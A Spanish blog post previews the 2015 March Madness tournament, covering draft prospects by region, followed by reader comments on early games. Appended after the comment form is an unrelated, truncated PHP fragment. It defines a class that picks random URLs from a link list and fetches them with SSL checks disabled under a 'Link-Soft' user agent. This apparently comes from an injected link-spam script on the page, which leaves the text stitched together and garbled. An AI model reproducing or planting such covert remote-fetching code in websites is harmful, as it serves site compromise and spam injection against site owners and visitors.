Previa March Madness 2015

17 de March de 2015 por txusma

Un año más llega la locura de Marzo, el evento universitario que paraliza el país y cuya fase final es tan seguida como las propias finales de la NBA. Un escaparate perfecto para que los jugadores llamados a ser escogidos en el próximo draft se luzcan ante los ojeadores. Un entorno propicio para ponerse a prueba y demostrar de qué pasta estan hechos.

Recordemos que los campeones de las 31 divisiones del país se han clasificado automáticamente y que los 37 equipos restantes han llegado mediante una invitación de un comité de expertos. Además de invitar equipos es este comité el que ordena y construye el cuadro del torneo basándose en varios factores. El domingo se presentó el bracket en lo que se conoce como el Selection Sunday.

Repasemos como han quedado las diferentes regiones y cuales son los jugadores ha seguir, siempre en clave NBA:

MIDWEST

Como no podía ser de otro modo los Kentucky Wildcats (1) han sido nombrados el mejor equipo del país. No en vano buscan convertirse en el primer equipo de la historia en acabar la temporada invicto. Están a solo 6 partidos de conseguirlo. Eric Bledsoe se preguntaba hace un tiempo si los Wildcats serían capaces de ganar a un equipo NBA como los Sixers y razones para preguntárselo no le faltan. Hasta 7 de sus jugadores aparecen en los mocks escogidos en primera o segunda ronda destacando los pívots Karl Towns y Willie Cauley-Stein por encima de todos. El dominicano es un jugador muy especial que a base de trabajo y gracias a su enorme potencial ha conseguido colocarse como la primera elección en algunos mocks mientras que Cauley-Stein es un prodigio físico de 7 pies capaz de defender a cualquier jugador que se le ponga delante y que seguramente será TOP-10. Pero aparte de estos dos jugadores no podemos olvidar al tirador Devin Booker (media 1ª ronda) , al alero Trey Lyles (1ª ronda) y otros jugadores que suenan para la 2ª como Dakari Johnson, Alex Poythress o Andrew Harrison. Nunca se ha reunido tanto talento junto en un equipo universitario… 

El segundo mejor equipo de la región son los Kansas Jayhawks (2). No podemos perder de vista a Kelly Oubre, un alero que pelea por ser escogido en el TOP-10 y que necesita de un buena actuación en el torneo para asegurarse una buena elección. En los Jayhawks también destacan Cliff Alexander (final de 1ª ronda, principios de 2ª) y un viejo conocido como Wayne Selden. Alguno tal vez recuerde que a principio de la temporada pasada, Selden sonaba para los puestos intermedios de 1ª ronda y empezó a bajar conformó se acercó la fecha del draft. Pues ahora ya no aparece ni en los mocks. Perfectamente puede quedarse sin ser escogido.

Si hay otros dos jugadores a los que seguir de cerca en esta region esos son Jerian Grant de los Notre Dame Fighting Irish (3) y Miles Turner de los Texas Loghorn (11). Ambos podrían enfrentarse si superan sus primeros escollos (Texas no lo tendrá nada fácil ante Butler) en lo que supondría un partido muy interesante que enfrentaría el poderoso juego interior de Texas con el versátil y talentoso juego exterior de Notre Dame. En estos momentos, tanto Grant como Turner aparecen en los puestos intermedios de la 1ª ronda. Un buen torneo podría colocarles en puestos de lotería.

Finalmente, apuntamos también los nombres de AJ Hammonds de los Purdue Boilermakers (9), Jake Layman de los Maryland Terrapins (4), Ron Baker de Wichita State (7) y los “Hoosiers” Yogi Ferrell y Troy Williams. Todos aparecen en la segunda ronda de algunos mocks.

WEST 

El número 1 de la West Region ha ido a parar a los Wisconsin Badgers. Son prácticamente el mismo bloque que ya consiguió llegar a la Final Four el año pasado y es que solo han perdido a unos de los titulares. Eso significa que tanto Frank Kaminsky (Player of the Year de la Big Ten) y Sam Dekker continúan en el equipo y que este año están aun más preparados que el pasado para asaltar el campeonato. A estas alturas es complicado que alguien no conozca a Kaminiky, un pívot blanco de 7 pies que anota 1 triple por partido con un 40% de acierto pero que no rehuye la pelea en poste bajo. El año pasado se marcó un torneo sensacional y este año aún ha mejorado su nivel. Pelea por ser escogido en puestos de lotería. Sam Dekker, un jugador del estilo de Kyle Singler, suena para los últimos puestos de la 1ª ronda.

Los Arizona Wildcats a pesar de haber perdido a Aaron Gordon o Nick Johnson se han plantado en este torneo con el número 2 de la región. Para paliar sus ausencias reclutaron a Stanley Johnson un alero que podría ser escogido entre los 5 primeros el próximo mes de junio gracias a sus increíbles habilidades defensivas pero que en las últimas semanas ha dejado algunas dudas. De hecho, algunos le consideran el jugador más sobrevalorado de toda la promoción. A su lado juega Rondae Hollis-Jefferson (final de primera ronda) y juntos forman un dúo capaz de cambiar partidos desde su propio campo. Si superan su primer partido y Ohio State (10) da la sorpresa ante VCU (7) se verán las caras con un jugador diametralmente opuestos a ellos, otro posible top-5, un jugador que enamora pero del que precisamente sobre su físico penden algunas dudas. Hablamos de D’Angelo Russell. Si acaban enfrentándose Arizona y Ohio State, este partido será un must-see.

Para acabar, hay que tener en cuenta los nombres de Bobby Porter de Arkansas (5)RJ Hunter de los Georgia State Panthers (10) y de varios jugadores de los Tar Heels (4) como son Kennedy Meeks, Justin Jackson o Brice Johnson.

EAST

En la East Region parten como primeros cabezas de serie otros Wilcats pero esta vez los de Villanova. Seguramente la noche del draft Adam Silver no pronunciará el nombre de ninguno de sus jugadores pero se trata de uno de los mejores juegos exteriores de todo el país y no han perdido un partido desde el 19 de Enero. De hecho, ha sido conforme se ha ido acercando el campeonato que han ido mejorando y afilando las hachas. Algo parecido sucede con el número 2 de la región los Virginia Cavaliers, un equipo que basa todo su juego en una excelente defensa y que es suficientemente eficiente en ataque como para llegar a la Final Four. Su problema es que su mejor jugador, el escolta Justin Anderson (2ª mitad de la 1ª ronda), no llega en las mejores condiciones tras fracturarse un dedo hace un mes.

Esta parte del cuadro no cuenta con jugadores que suenen para ser escogidos muy arriba en el draft. El jugador de Louisville (4), Montrezl Harrell, una bestia parda de esas que no mete ni un 50% en TL pero que defiende como si le fuera la vida en ello, y Kris Dunn, de los Providence Friars (6), un base bastante alto de muy buenas maneras pero que ha sufrido varios problemas en uno de sus hombros, luchan por ser elegidos en puestos de lotería.

También podemos apuntar los nombres de Jarrell Martin y Jordan McKie de LSU (9), Buddy Hield de los Oklahoma Sooners (3)Terry Rozier, también de los Cardinals, o de Mamadou Ndiaye un jugador senegalés que mide 228 cm que tendría que hacer para empezar un buen partido contra Harrell para tan solo soñar con ser escogido en el próximo draft.

SOUTH

En la South Region encontramos varios nombres que hay que subrayar con rotulador fluorescente amarillo chillón. El primero de ellos es el de Jahiil Okafor de los Duke Blue Devils, los primeros cabeza de serie. Los Blue Devils viven y mueren en Okafor porque acumulan sus mismos defectos y virtudes: son absolutamente devastadores en ataque pero en cambio sufren en defensa. El juego interior del que muchos mocks sitúan como número 1 del próximo draft es primoroso, no en vano le comparan con Al Jefferson, pero su defensa también se parece a la del jugador de los Hornets. En todo caso tiene potencial para convertirse en un auténtico jugador franquicia. A su lado jugará Justise Winslow, hijo de Ricky Winslow aquel alero que jugó 5 años en el Estudiantes y que ganó el concurso de mates de 1990. Winslow Jr. es parecido a su padre: otro alero de gran físico y talento, puro espectáculo, que puede salir entre los 10 primeros del draft. Tyus Jones completa el trío de jugadores de los Blue Devils que pueden escchar su nombre en la primera ronda.

El número de 2 la región son los Bulldogs con Kyle Wiltjer a la cabeza pero con otro hijo de famoso en el equipo, Domantas Sabonis. El lituano debería pasarse un año más en la universidad porque las apuestas ya le sitúan como primera ronda clara en 2016. Gonzaga llega con ganas de mejorar sus últimas actuaciones en las que ha sido eliminado por rivales teóricamente inferiores.

UCLA (11) finalmente ha sido escogido para participar en el torneo lo que nos permitirá ver a Kevon Looney y Norman Powell. Atentos sobretodo al primero, un 3-4 con grandes aptitudes físicas y gran reboteador con un potencial infinito, que pordría incluso ser escogido cerca del TOP-5. Nos fijaremos también en Malik Pope de los San Diego State (9), otro alero con gran potencial pero muy verde aún como para dar el salto. Y para acabar el repaso, los jugadores de los Utah Utes (5), Jakob Poeltl, pívot blanco de los que algunos GM de fantasy leagues huyen como de la peste, y Delon Wright, el hermano de Dorrell Wright, actual jugador de los Blazers.

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Empieza ahora la segunda parte del UAB – Iowa State,3 arriba los primeros de manera sorpresiva,ya que este partido se esperaba fuera una paliza del equipo de Hoiberg (para quien no le suena,entrenador que saldrá en todas las quinielas verano tras verano para ocupar un banquillo NBA,y cuyo estilo es netamente ofensivo y vistoso).Las 2 faltas de Niang en la primera parte le llevaron al banquillo,situación aprovechada a la perfección por los Blazers.

    PD. ya están empate a 31,sería muy raro que UAB llegue con el partido igualado a los 5 últimos minutos.

      Citar

  2. Ruxixón dice:
    #2

    Pues esto es la Madness,y primera locura del torneo,a base de buena defensa y controlando el rebote,y lo más importante,controlando el tempo del partido,sin dejar jugar rápido a los Cyclones,UAB se carga a Iowa State,y con ello millones de brackets.UPSET!

      Citar

  3. Ruxixón dice:
    #3

    Acaba mal pero vaya maravilla de crossover de D’Angelo Russell. 28 puntos y 6 rebotes para él y Ohio State a vérselas con los Wildcats.Muy duro para Ohio St.

    https://www.youtube.com/watch?v=Xi9Q_xBdlBw

    Mi jugador favorito del próximo draft -si se presenta-

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>